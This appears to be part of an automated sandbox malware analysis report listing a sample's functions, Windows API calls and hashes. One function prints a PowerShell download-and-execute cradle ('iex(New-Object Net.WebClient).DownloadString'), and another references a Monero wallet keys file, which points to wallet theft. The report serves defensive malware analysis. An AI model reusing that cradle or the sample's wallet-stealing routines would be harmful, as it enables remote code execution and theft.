                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: cd3804737e460f9a1cae75d710f9bf4b0e1072dc6a90fbcef0441ffba12aa548
                                    • Instruction ID: 07959bcc81d9c69162c51d04c4ba20947e8e1b877b85735ece239bb786e8855f
                                    • Opcode Fuzzy Hash: cd3804737e460f9a1cae75d710f9bf4b0e1072dc6a90fbcef0441ffba12aa548
                                    • Instruction Fuzzy Hash: 4D212875A1021CABDB64DB54DC85FE9B3B8FB48704F00C1E8E609A6180DF71AA85CFE4
                                    Function 001A99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A99C5
                                    • Process32First.KERNEL32(0019A056,00000128), ref: 001A99D9
                                    • Process32Next.KERNEL32(0019A056,00000128), ref: 001A99F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001A9A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 001A9A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 001A9A79
                                    • CloseHandle.KERNEL32(0019A056), ref: 001A9A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 22b67e36e992690141257d4642451594662658b62cd40d62aa0130c534428751
                                    • Instruction ID: 0247cb2eedd52ae028d3f520fcc44e0d34409289d2d0e14465d46ce923a27671
                                    • Opcode Fuzzy Hash: 22b67e36e992690141257d4642451594662658b62cd40d62aa0130c534428751
                                    • Instruction Fuzzy Hash: 88212C74910218EBDB25DFA1CC88BDEB7B5BB49304F0041D9E50AA7290D7B49EC4CF51
                                    Function 001A78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A78C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A78CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E1B770,00000000,00020119,001A7849), ref: 001A78EB
                                    • RegQueryValueExA.ADVAPI32(001A7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001A790A
                                    • RegCloseKey.ADVAPI32(001A7849), ref: 001A7914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 13e94ef685f80df1d46faa0d58e3a9248a84ea3dcf0718071d59aa9dcdc746a3
                                    • Instruction ID: daa5e05bd5bf6e7e9a3ee77f45b56fcf340f4f148ac6eadd544f0ff74dc6fea4
                                    • Opcode Fuzzy Hash: 13e94ef685f80df1d46faa0d58e3a9248a84ea3dcf0718071d59aa9dcdc746a3
                                    • Instruction Fuzzy Hash: E10117B9A44309BFDB00DFE4DC49FAE7778EB44704F104595F605A7281E7B05A00CB95
                                    Function 0019A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                    • LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 3eae9789b6d038916d2fb434585c251553ad73b70f79fbc820bec2c52c7266c7
                                    • Instruction ID: 62874def395c38ee82f44e6b062f10957de831856242b04b38f0a3d0325c1aee
                                    • Opcode Fuzzy Hash: 3eae9789b6d038916d2fb434585c251553ad73b70f79fbc820bec2c52c7266c7
                                    • Instruction Fuzzy Hash: E131FA74A00209EFDF14CFA4C885BEE77B5AF48704F508168E911A7290D774AA85CFA2
                                    Function 001A49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,00E2E7A0), ref: 001A4A2B
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A4A51
                                    • lstrcat.KERNEL32(?,?), ref: 001A4A70
                                    • lstrcat.KERNEL32(?,?), ref: 001A4A84
                                    • lstrcat.KERNEL32(?,00E1AE50), ref: 001A4A97
                                    • lstrcat.KERNEL32(?,?), ref: 001A4AAB
                                    • lstrcat.KERNEL32(?,00E2DCA8), ref: 001A4ABF
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A8F20: GetFileAttributesA.KERNEL32(00000000,?,00191B94,?,?,001B577C,?,?,001B0E22), ref: 001A8F2F
                                      • Part of subcall function 001A47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001A47D0
                                      • Part of subcall function 001A47C0: RtlAllocateHeap.NTDLL(00000000), ref: 001A47D7
                                      • Part of subcall function 001A47C0: wsprintfA.USER32 ref: 001A47F6
                                      • Part of subcall function 001A47C0: FindFirstFileA.KERNEL32(?,?), ref: 001A480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: a30d463c40cdaf2c763d8923e05ab9633ea284a1bbcdcc9fac4eacb394a0bc20
                                    • Instruction ID: 5049092768f6d4ddb7ff19c14ea9c0580d875334b92a54855d66171064f129f3
                                    • Opcode Fuzzy Hash: a30d463c40cdaf2c763d8923e05ab9633ea284a1bbcdcc9fac4eacb394a0bc20
                                    • Instruction Fuzzy Hash: 98315FB69002086BDB14EBB0DC95EED733CAB59700F404599B24596051FFB0A7C8CBA5
                                    Function 001A2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A2FD5
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001A2F54
                                    • <, xrefs: 001A2F89
                                    • ')", xrefs: 001A2F03
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001A2F14
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 4bc7bdd4b5d3f7d2afb91fcd9dc825952bba98e57fb242477e8aee8960eea8b1
                                    • Instruction ID: 47326013864157affc4c02af6ee870419ecf8462adfbb98e5fba4beb11618a70
                                    • Opcode Fuzzy Hash: 4bc7bdd4b5d3f7d2afb91fcd9dc825952bba98e57fb242477e8aee8960eea8b1
                                    • Instruction Fuzzy Hash: 61410C75D502089ADB58FFA0C8A2FEDBB79AF25300F804459F11667192EF706A49CFA1
                                    Function 0020CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: 50a6f89b7882a69e6860d3eee8fab7ccbb30833765e4f399afb42cdcf1d5bf42
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 742181F2D2071AABEB219F55CC4197F3A69EB81B94F254316F80967292C3304D618FA0
                                    Function 001A6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 001A6C0C
                                    • sscanf.NTDLL ref: 001A6C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001A6C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001A6C60
                                    • ExitProcess.KERNEL32 ref: 001A6C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: dca9872030f8ca9c9e2afbb89166e7db1c249f168bc7d933f963f9256976d4f4
                                    • Instruction ID: 2aacb426260354f16dd459ee81ea1b251aeca77efe96c58bee7739b37ab4839f
                                    • Opcode Fuzzy Hash: dca9872030f8ca9c9e2afbb89166e7db1c249f168bc7d933f963f9256976d4f4
                                    • Instruction Fuzzy Hash: 8121EBB5D14208ABCF04EFE4E8559EEB7B9BF48304F04856AE516A3250EB749608CB69
                                    Function 001A7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E1B850,00000000,00020119,?), ref: 001A7FEE
                                    • RegQueryValueExA.ADVAPI32(?,00E2DE68,00000000,00000000,000000FF,000000FF), ref: 001A800F
                                    • RegCloseKey.ADVAPI32(?), ref: 001A8022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 793c17ed73a12025594968e90565a0ac23e74adb963a47621e37e678edf23086
                                    • Instruction ID: 33b1fe324a387f86ed62f96b0bcb71b738e084934f21f154a84f66f7cb9380b4
                                    • Opcode Fuzzy Hash: 793c17ed73a12025594968e90565a0ac23e74adb963a47621e37e678edf23086
                                    • Instruction Fuzzy Hash: 53119EB5A44305EBD704CF94DD86FBFBBB8EB05B14F104269F611A7280E7B558008BA2
                                    Function 001A93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(00E2E6B0,00000000,00000000,?,00199F71,00000000,00E2E6B0,00000000), ref: 001A93FC
                                    • lstrcpyn.KERNEL32(00467580,00E2E6B0,00E2E6B0,?,00199F71,00000000,00E2E6B0), ref: 001A9420
                                    • lstrlen.KERNEL32(00000000,?,00199F71,00000000,00E2E6B0), ref: 001A9437
                                    • wsprintfA.USER32 ref: 001A9457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: e6043fb5066c8fae0e36bff5c9029995532b1a2e753292335c92f365a1f9b2dc
                                    • Instruction ID: 3d7ee7d37c2a526a20f88816c16faea660eb21cc986b61aa5f1f8f0ad2f9dd90
                                    • Opcode Fuzzy Hash: e6043fb5066c8fae0e36bff5c9029995532b1a2e753292335c92f365a1f9b2dc
                                    • Instruction Fuzzy Hash: D2011E75514108FFCB04DFA8C954EAE7B78EB48308F108699F90A8B300E775AA40DB95
